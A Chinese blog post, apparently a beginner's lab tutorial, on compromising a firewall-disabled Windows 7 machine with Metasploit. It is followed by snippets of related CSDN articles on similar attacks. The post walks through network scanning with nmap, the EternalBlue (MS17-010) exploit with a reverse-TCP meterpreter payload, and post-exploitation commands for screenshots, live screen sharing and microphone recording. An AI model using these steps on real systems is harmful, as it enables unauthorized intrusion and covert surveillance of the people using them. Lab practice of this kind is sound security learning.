Metasploit入侵win7系统

最新推荐文章于 2024-01-04 08:00:00 发布
最新推荐文章于 2024-01-04 08:00:00 发布
阅读量2.2k 收藏 18
点赞数
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45092418/article/details/106837981
版权

Metasploit入侵win7系统

一:实验环境

主机:安装有Metasploit的kali linux 操作系统
目标:已关闭防火墙的win7系统

二:获得信息

a.获得网络拓扑图

画出网络拓扑图,确定你和目标主机在同一局域网下。

b.获得主机ip和目标ip

1.主机ipifconifg
在这里插入图片描述
这里的eth0是你有线连接的ip地址,也是lhost。
2.目标ipnmap -nsP 192.168.x.x/24
192.168.x.x/24,通过扫描得到与你相同网段下所有主机IP,加以区分后,最终得到rhost。

三:实施入侵

a.打开控制终端

输入:msfconsole
在这里插入图片描述

b.查找漏洞

控制台输入search platform:windows 7
在这里插入图片描述
这里我使用1037对应的漏洞攻击:控制台输入use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

c.进行配置

set payload/windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set rhost 192.168.x.x
set lport 2345
run

四:对主机进行操作

help命令可以查看有那些命令可以使用,下面是一些立竿见影的:

screenshot  #这个是屏幕截图
screenshare	#这个是实时获取另一主机屏幕内容
record_mic  #开始录音
dir 		#查看目标主机所有文件

五:做个守法的好青年

可能有人会质疑了,你关闭了防火墙再去入侵,相当与没做啊!原谅我还只是个菜鸡中的菜鸡,等我哪一天会绕过防火墙了,我会再写一篇告诉你们的!!!还有,入侵不是给你个IP就行了,真实生活中,肯定有好多意外发生,但电脑的防火墙是可以主动关闭的。

尽是他乡之客
关注
  • 0
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3060
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2650
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
metasploit 入侵测试手册
06-19
metasploit penetration testing cookbook
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2677
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
MS08-067漏洞 入侵Windows7
qq_34835962的博客
04-10 1693
简单到有手就行!!!Kali msf打win7永恒之蓝漏洞
最新发布
weixin_54475173的博客
01-04 898
kali msf 打windows7 永恒之蓝
利用msf对靶机metasploitable2和win7进行信息收集
m0_47510703的博客
01-19 8569
一、基于 tcp 协议收集主机信息 1、使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息 Metasploit中也有nmap db_nmap -sV 192.168.0.103 -sV 探测打开的端口以确定服务 这里我们可以看到目标开启的服务以及目标的MAC地址和操作系统 2、使用arp_sweep模块探查局域网内主机 use auxiliary/scanner/discovery/arp_sweep 通过“show options”来查看需要设置哪些
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
关于在服务器上启用metasploit如何使用后渗透命令screenshare进行屏幕共享的方法
github_69216388的博客
08-26 1984
MSF,metasploit小白进阶
kali入侵win7
caijinbo
11-23 5579
title: kali入侵win7 tags: 教程 author: caijinbo date: 2019-11-19 前提说明 1.在同个局域网内 2.准备纯净系统win7系统电脑一台 3.准备kali系统一台 4.我的操作均是在虚拟机上完成,可能在物理机上效果会有所不同。 步骤 第一步: 扫描局域网内存活的主机: nmap -sP 192.168.1.0/24 (扫描较快) 也可以直接...
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1633
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵
weixin_34138521的博客
04-28 380
影子经纪人(Shadow Brokers)最近陆续曝光的NSA网络武器令人震惊,尽管这些工具是否出自国家级别黑客团队之手尚不清楚,但至少存在一个可以说明问题的事实:这些漏洞利用工具都能有效运行,且具有一定程度的威胁杀伤力。在此,我用NSA的两个大杀器演示对Win 7和Windows  Server 2008系统进行漏洞利用和入侵控制的过程复现。 复现工具说明 在需要用到两个比较有意思的工具,一个...
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 1907
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
Metaploit-永恒之蓝漏洞利用
weixin_30662011的博客
07-12 995
目录 Metaploit介绍 实验环境 漏洞利用过程 Metaploit介绍   本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口...
kali Linux的设置和优化(双系统)
热门推荐
weixin_45092418的博客
06-02 1万+
Kali Linux的安装(双系统) 目录Kali Linux的安装(双系统)写在前面一:从官网下载系统映像二:利用U盘安装三:开机用户名为root四:kali系统设置1.更新源2.vim使用说明五:软件更新和安装六:常见问题1.chorm浏览器的下载2.安装软件包3.更改桌面文件(.desktop) 写在前面 萌新出行,大佬们看看就行了,欢迎指正!!! 文件位置:文件夹->其他位置-> 计算机 当你不想用vim打开,可以按照路径进行查找和打开。 一:从官网下载系统映像 [官方下载地址](htt
metasploit 木马 win10
08-12
- *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值